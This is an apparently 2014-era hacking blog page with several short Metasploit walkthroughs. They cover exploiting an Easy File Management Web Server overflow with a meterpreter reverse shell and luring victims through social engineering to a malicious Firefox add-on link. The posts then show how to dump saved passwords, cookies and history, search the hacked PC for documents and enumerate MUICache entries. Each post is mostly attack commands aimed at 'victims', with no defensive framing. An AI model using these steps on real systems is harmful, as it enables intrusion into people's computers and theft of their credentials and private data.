Hack Remote Windows PC using Easy File Management Web Server Stack Buffer Overflow

at 5:58 AM Friday, June 20, 2014 0 comments
Easy File Management Web Server v4.0 and v5.3 contains a stack buffer overflow condition that is triggered as user-supplied input is not properly validated when handling the UserID cookie. This may allow a remote attacker to execute arbitrary code.

Exploit Targets
Easy File Management Web Server v5.3

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/http/efs_fmws_userid_bof
msf exploit (efs_fmws_userid_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (efs_fmws_userid_bof)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (efs_fmws_userid_bof)>set rhost 192.168.1.2 (IP of Remote Host)
msf exploit (efs_fmws_userid_bof)>exploit


Labels: ,

Gather Cookies and History of Mozilla Firefox in Remote Windows, Linux or MAC PC

at 7:12 PM Friday, June 13, 2014 0 comments
Open Kali terminal type msfconsole


Now type use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf exploit (firefox_xpi_bootstrapped_addon)>set payload firefox/shell_reverse_tcp
msf exploit (firefox_xpi_bootstrapped_addon)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (firefox_xpi_bootstrapped_addon)>set uripath /
msf exploit (firefox_xpi_bootstrapped_addon)>exploit  

Now an URL you should give to your victim http://192.168.1.9:8080/

Send the link of the server to the victim via chat or email or any social engineering technique. Now you have access to the victims PC


Once we have the shell, we simply run the post module to dump the credentials to a file

How to Gather History

Now type use post/firefox/gather/history
msf exploit (history) set payload firefox/shell_reverse_tcp
msf exploit (history)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (history)>set session 1
msf exploit (history)>exploit   


Result will stored on your local computer
/root/.msf4/loot/
A look at the result, you will see data like


How to Gather Cookies

Once we have the shell, we simply run the post module to dump the credentials to a file

Now type use post/firefox/gather/cookies
msf exploit (cookies) set payload firefox/shell_reverse_tcp
msf exploit (cookies)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (cookies)>set session 1
msf exploit (cookies)>exploit  


Result will stored on your local computer
/root/.msf4/loot/

Labels: ,

Hack Save Password in Mozilla Firefox in Remote Windows, Linux or MAC PC

at 8:11 PM Thursday, June 12, 2014 0 comments
Open Kali terminal type msfconsole

Now type use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf exploit (firefox_xpi_bootstrapped_addon)>set payload firefox/shell_reverse_tcp
msf exploit (firefox_xpi_bootstrapped_addon)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (firefox_xpi_bootstrapped_addon)>set uripath /
msf exploit (firefox_xpi_bootstrapped_addon)>exploit  

Now an URL you should give to your victim http://192.168.1.9:8080/

Send the link of the server to the victim via chat or email or any social engineering technique. Now you have access to the victims PC


Once we have the shell, we simply run the post module to dump the credentials to a file

Now type use post/firefox/gather/passwords
msf exploit (passwords) set payload firefox/shell_reverse_tcp
msf exploit (passwords)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (passwords)>set session 1
msf exploit (passwords)>exploit  

Result will stored on your local computer
/root/.msf4/loot/

A look at the result, you will see data like
Labels: ,

How to Find ALL Excel, Office, PDF, and Images Files in Remote PC

at 1:05 PM Wednesday, June 11, 2014 0 comments
First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

Find ALL MS Excel Files

This command will search through all subdirectories below for a file that matches that file name

Type dir *.xls /s


Find ALL MS office Files

This command will search through all subdirectories below for a file that matches that file name

Type dir *.doc /s


This command will search through all subdirectories below for a file that matches that file name

Type dir *.exe /s


 This command will search through all subdirectories below for a file that matches that file name

Type dir *.jpg /s


This command will search through all subdirectories below for a file that matches that file name

Type dir *.pdf /s

Labels: ,

How to Gather MUICache Entries in Remote Windows PC

at 2:36 AM Tuesday, June 10, 2014 0 comments
According to Nirsoft.net, “each time that you start using a new application, Windows operating system automatically extract the application name from the version resource of the exe file, and stores it for using it later, in Registry key known as the ‘MuiCache’.”

This module gathers information about the files and file paths that logged on users have executed on the system. It also will check if the file still exists on the system. This information is gathered by using information stored under the MUICache registry key. If the user is logged in when the module is executed it will collect the MUICache entries by accessing the registry directly. If the user is not logged in the module will download users registry hive NTUSER.DAT/UsrClass.dat from the system and the MUICache contents are parsed from the downloaded hive.

Exploit Targets
Windows 7

Requirement
Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole


Now type use post/windows/gather/enum_muicache
msf exploit (enum_muicache)>set payload windows/meterpreter/reverse_tcp
msf exploit (enum_muicache)>set lhost 192.168.1.3 (IP of Local Host)
msf exploit (enum_muicache)>set session 2
msf exploit (enum_muicache)>exploit




Result will stored on your local computer

/root/.msf4/loot/

Labels: ,
Subscribe to: Posts (Atom)